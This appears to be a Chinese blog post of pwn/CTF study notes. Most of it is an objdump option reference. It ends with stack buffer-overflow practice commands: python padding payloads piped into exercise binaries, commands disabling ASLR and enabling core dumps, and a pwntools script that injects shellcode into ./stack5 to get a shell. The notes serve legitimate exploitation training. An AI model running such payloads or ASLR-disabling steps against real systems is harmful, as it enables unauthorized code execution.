pwn波c语言程序,pwn的一些命令

objdump命令

--archive-headers

-a

显示档案库的成员信息,类似ls-l将lib*.a的信息列出。

-b bfdname

--target=bfdname

指定目标码格式。这不是必须的,objdump能自动识别许多格式,比如:

objdump -b oasys -m vax -h fu.o

显示fu.o的头部摘要信息,明确指出该文件是Vax系统下用Oasys编译器生成的目标文件。objdump -i将给出这里可以指定的目标码格式列表。

-C

--demangle

将底层的符号名解码成用户级名字,除了去掉所开头的下划线之外,还使得C++函数名以可理解的方式显示出来。

--debugging

-g

显示调试信息。企图解析保存在文件中的调试信息并以C语言的语法显示出来。仅仅支持某些类型的调试信息。有些其他的格式被readelf-w支持。

-e

--debugging-tags

类似-g选项,但是生成的信息是和ctags工具相兼容的格式。

--disassemble

-d

从objfile中反汇编那些特定指令机器码的section。

-D

--disassemble-all

与-d类似,但反汇编所有section.

--prefix-addresses

反汇编的时候,显示每一行的完整地址。这是一种比较老的反汇编格式。

-EB

-EL

--endian={big|little}

指定目标文件的小端。这个项将影响反汇编出来的指令。在反汇编的文件没描述小端信息的时候用。例如S-records.

-f

--file-headers

显示objfile中每个文件的整体头部摘要信息。

-h

--section-headers

--headers

显示目标文件各个section的头部摘要信息。

-H

--help

简短的帮助信息。

-i

--info

显示对于-b或者-m选项可用的架构和目标格式列表。

-j name

--section=name

仅仅显示指定名称为name的section的信息

-l

--line-numbers

用文件名和行号标注相应的目标代码,仅仅和-d、-D或者-r一起使用使用-ld和使用-d的区别不是很大,在源码级调试的时候有用,要求编译时使用了-g之类的调试编译选项。

-m machine

--architecture=machine

指定反汇编目标文件时使用的架构,当待反汇编文件本身没描述架构信息的时候(比如S-records),这个选项很有用。可以用-i选项列出这里能够指定的架构.

--reloc

-r

显示文件的重定位入口。如果和-d或者-D一起使用,重定位部分以反汇编后的格式显示出来。

--dynamic-reloc

-R

显示文件的动态重定位入口,仅仅对于动态目标文件意义,比如某些共享库。

-s

--full-contents

显示指定section的完整内容。默认所有的非空section都会被显示。

-S

--source

尽可能反汇编出源代码,尤其当编译的时候指定了-g这种调试参数时,效果比较明显。隐含了-d参数。

--show-raw-insn

反汇编的时候,显示每条汇编指令对应的机器码,如不指定--prefix-addresses,这将是缺省选项。

--no-show-raw-insn

反汇编时,不显示汇编指令的机器码,如不指定--prefix-addresses,这将是缺省选项。

--start-address=address

从指定地址开始显示数据,该选项影响-d、-r和-s选项的输出。

--stop-address=address

显示数据直到指定地址为止,该项影响-d、-r和-s选项的输出。

-t

--syms

显示文件的符号表入口。类似于nm-s提供的信息

-T

--dynamic-syms

显示文件的动态符号表入口,仅仅对动态目标文件意义,比如某些共享库。它显示的信息类似于nm -D|--dynamic显示的信息。

-V

--version

版本信息

--all-headers

-x

显示所可用的头信息,包括符号表、重定位入口。-x等价于-a -f -h -r -t同时指定。

-z

--disassemble-zeroes

一般反汇编输出将省略大块的零,该选项使得这些零块也被反汇编。

@file可以将选项集中到一个文件中,然后使用这个@file选项载入。

将C函数编译为二进制程序:

$ gcc stack0.c-o stack0-fno-stack-protector -m32

gcc-ghello.c-ohello

g++-ghello.cpp-ohello

使用python打印并输入本地程序

$ python -c "print 'A'*65" | ./stack0

$ python -c "print'A'*64+'\x64\x63\x62\x61'" | xargs ./stack1

这里的 xargs 表示输入数据作为参数。

$./overflow1-3948d17028101c40$(python-c 'print"A"*64+ "B"')

当程序调用环境变量时,可修改环境变量

$ export GREENIE=`python -c 'print "A"*64 + "\x0a\x0d\x0a\x0d"'`

开启core dump的记录功能。

ulimit -cunlimited

sudo sh -c 'echo"/tmp/core.%t" > /proc/sys/kernel/core_pattern'

制造溢出

$ python -c "print 'A'*200" | ./stack5

$ gdb stack5 /tmp/core.1522317467

gdb-peda$ x/10s $esp-0x50

$strace./overflow3-28d8a442fb232c0c$(python-c'print"A"*76+"BBBB"')

关闭Linux系统的ASLR保护。

sudo sh -c"echo 0 > /proc/sys/kernel/randomize_va_space"

判断当前是否开启ASLR保护。

$setarch `uname -m`-R ./overflow4-4834efeff17abdfb/$(python-c 'print "A"*76 + "BBBB"')

from pwn import *

io = process('./stack5')

sc = asm(shellcraft.i386.sh())

payload = sc

payload += ((0x48+4)-len(sc)) * 'a'

payload += '\x20\xcf\xff\xff'

io.sendline(payload)

io.interactive()ROPgadget --binary ./stack4

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值